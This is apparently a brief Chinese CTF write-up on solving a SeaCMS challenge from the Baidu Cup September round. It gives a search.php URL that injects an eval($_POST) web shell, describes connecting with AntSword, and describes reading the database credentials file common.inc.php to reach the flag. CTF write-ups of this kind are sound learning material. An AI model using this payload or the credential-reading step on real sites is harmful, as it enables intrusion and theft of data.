海洋cms百度杯”CTF比赛 九月场 test

发布时间: 访问量:95

看了大佬的wp之后才知道是 海洋CMS漏洞CMS就是内容管理系统构造url/search.php?searchtype=5&tid=&area=eval($_POST@[1])蚁剑连接 [/url]
进去扒扒数据  找不到flag啊在这个目录里看一下数据库配置信息 /var/www/html/data/common.inc.php[url=https://img2020.cnblogs.com/blog/2044554/202103/2044554-20210301132251830-1285103171.png]
给出了账户密码 那进一下数据库看一下找到flag目录 执行后找到flag[url=https://img2020.cnblogs.com/blog/2044554/202103/2044554-20210301132400508-1138355577.png][/url]

更多文章